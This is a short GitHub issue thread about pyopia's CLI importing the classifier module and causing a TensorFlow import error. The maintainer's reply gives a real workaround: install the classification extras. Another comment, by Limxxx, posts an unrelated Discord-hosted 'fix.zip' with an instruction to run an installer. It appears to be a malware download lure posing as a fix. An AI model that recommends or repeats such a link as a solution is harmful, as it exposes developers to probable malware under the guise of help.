### ISSUE TITLE
Command line interface imports pyopia.classifier regardless of install options, potentially triggering an import tensorflow error

### ISSUE THREAD

**Issue by nepstad** [SINTEF/pyopia#246]

**Comment by Limxxx** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by emlynjdavies** [comment]
Workaround: Install with classification dependencies i.e.

`pip install pyopia[classification]`
